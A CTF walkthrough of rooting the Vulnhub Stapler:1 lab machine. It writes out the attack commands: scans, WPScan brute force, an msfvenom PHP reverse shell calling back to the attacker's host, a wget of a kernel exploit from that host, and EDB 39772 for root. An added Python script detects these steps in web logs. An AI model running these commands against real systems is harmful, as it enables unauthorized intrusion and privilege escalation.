Stapler:1 – CTF

This is a walkthrough of how I gained root access to the Stapler:1 image from Vulnhub.com. This walkthrough is provided for educational purposes only. All testing on this image was done in an isolated lab environment. Understand that using the tools in this walkthrough against a host without permission is against the law. Be smart, folks, and enjoy the walkthrough.

Full Nmap scan of the host:

root@kali:~# nmap -p- -A 192.168.1.235

stapler1

There are a lot of ports/services to enumerate here.  After some time, my enumeration of port 12380 uncovered some interesting things.

Enumerating port 12380 with Nikto:

root@kali:~# nikto -h https://192.168.1.235:12380

stapler2

The Nikto scan found a robots.txt file with two entries in it. Investigating these brings me to a WordPress site.

stapler3

Using WPScan to get version and plugin info:

root@kali:~# wpscan --url https://192.168.1.235:12380/blogblog/

stapler4

The WordPress version is 4.2.1. I didn’t find anything useful with regard to plugins or their versions.

Using WPScan to enumerate users:

root@kali:~# wpscan -u https://192.168.1.235:12380/blogblog/ --enumerate u

stapler5

Using WPScan to brute force the login (starting with the user john):

root@kali:~# wpscan -u https://192.168.1.235:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou.txt --username john

wpscan6

I am able to log in to WordPress using the credentials john/incorrect. Now to create a reverse shell payload.

Creating a reverse shell payload using msfvenom:

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.234 LPORT=4444 -f raw > shell235.php

stapler7

Uploading my .php reverse shell through the plugins page:

Browse to Plugins -> Add New -> Upload Plugin. Select the PHP shell file and upload it. In my case, the file is shell235.php.

stapler9

After clicking Install Now, the next page asks for an FTP path and FTP credentials. You don’t have to do anything here; the file has already been uploaded.

Verifying that the .php file has been uploaded:

stapler10

As you can see, my shell235.php is there. Now let’s get our Metasploit handler ready to catch this shell.

Metasploit handler options:

stapler8

Executing the reverse shell by clicking on shell235.php:

stapler10

Catching the low privilege shell:

stapler11

As you can see from the screenshot, we are connected as the low privilege user www-data.
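Seen from the defending side, the web-facing steps above (the WPScan brute force against wp-login.php, the plugin upload, and the first request for the uploaded shell) each leave a distinct trail in the web server's access log: a burst of POSTs to wp-login.php from one address, a POST to the plugin upload handler in wp-admin, and then a request for a .php file under wp-content/uploads/, a directory that should only ever hold media. The Python script below is an added example, not part of the original walkthrough, that runs those three checks over a constructed sample log. The IP 192.168.1.234 and the file name shell235.php are taken from the walkthrough; the /blogblog/wp-content/uploads/ location of the dropped file is an assumption, and the threshold of 20 login POSTs within five minutes is a tunable starting point rather than a recommended value.

```python
# Added example (not from the original walkthrough): detect the web-side
# steps of this attack chain in Apache/nginx "combined" format access logs.
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["status"] = int(e["status"])
    return e


def detect_login_bruteforce(entries, threshold=20, window=timedelta(minutes=5)):
    """Map IP -> peak number of POSTs to wp-login.php inside any sliding window.

    Only IPs that reach `threshold` are returned. A failed WordPress login is
    answered with 200 and the re-rendered form, so the signal is the burst of
    POSTs itself, not a run of 401s.
    """
    by_ip = defaultdict(list)
    for e in entries:
        if e["method"] == "POST" and e["path"].split("?")[0].endswith("/wp-login.php"):
            by_ip[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


def detect_plugin_uploads(entries):
    """Return (ip, ts) for every POST to the plugin upload handler."""
    return [(e["ip"], e["ts"]) for e in entries
            if e["method"] == "POST"
            and "/wp-admin/update.php" in e["path"]
            and "action=upload-plugin" in e["path"]]


def detect_php_under_uploads(entries):
    """Return (ip, path, status) for the first request to each .php file below
    wp-content/uploads/. Media uploads never need PHP there, so any hit is worth
    an alert whatever the status code."""
    seen, hits = set(), []
    for e in entries:
        path = e["path"].split("?")[0]
        if "/wp-content/uploads/" in path and path.lower().endswith(".php") and path not in seen:
            seen.add(path)
            hits.append((e["ip"], path, e["status"]))
    return hits


def build_sample_log():
    """Constructed sample log (not captured from the VM). The attacker IP and the
    file name shell235.php follow the walkthrough; the uploads/ path is an
    assumption about where a loose .php file lands after a failed plugin install."""
    base = datetime(2016, 6, 10, 14, 0, 0, tzinfo=timezone.utc)

    def line(offset, ip, request, status):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{request} HTTP/1.1" {status} 3412'

    lines = [line(0, "10.0.0.5", "GET /blogblog/", 200),               # ordinary reader
             line(5, "10.0.0.5", "POST /blogblog/wp-login.php", 302)]  # one legitimate login
    for i in range(25):                                                # failed guesses, 2 s apart
        lines.append(line(60 + 2 * i, "192.168.1.234", "POST /blogblog/wp-login.php", 200))
    lines.append(line(120, "192.168.1.234", "POST /blogblog/wp-login.php", 302))  # guess succeeded
    lines.append(line(200, "192.168.1.234",
                      "POST /blogblog/wp-admin/update.php?action=upload-plugin", 200))
    lines.append(line(260, "192.168.1.234", "GET /blogblog/wp-content/uploads/shell235.php", 200))
    return lines


def run(lines=None):
    """Parse the log lines (sample log by default) and return all three findings."""
    entries = [e for e in map(parse_line, lines or build_sample_log()) if e]
    return {
        "bruteforce": detect_login_bruteforce(entries),
        "plugin_uploads": detect_plugin_uploads(entries),
        "php_in_uploads": detect_php_under_uploads(entries),
    }


if __name__ == "__main__":
    for name, finding in run().items():
        print(f"{name}: {finding}")
```

On the sample log the brute-force check flags only 192.168.1.234 (26 POSTs in well under five minutes, while the legitimate reader's single POST stays below threshold), the upload check returns the one POST to update.php, and the uploads check returns the first request for shell235.php. In production the same logic fits naturally into a SIEM rule; the .php-under-uploads check in particular is cheap and almost never fires on legitimate traffic.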

OS enumeration provides the kernel and the Linux distribution/version:

stapler12

Searching the local Exploit-DB copy for privilege escalation vulnerabilities:

root@kali:~# searchsploit linux kernel 4.4 Ubuntu 16

stapler13

Identified a local privilege escalation exploit: EDB-ID 39772 / CVE-2016-4557. The PoC code can be found here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

Transferred the exploit code to the target using wget:

wget http://192.168.1.234/exploit.tar

stapler14

Compiled the exploit:

./compile.sh

stapler15

Running the exploit code:

www-data@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput

stapler16

Exploit code worked!

The flag.txt file:

cat /root/flag.txt

stapler17
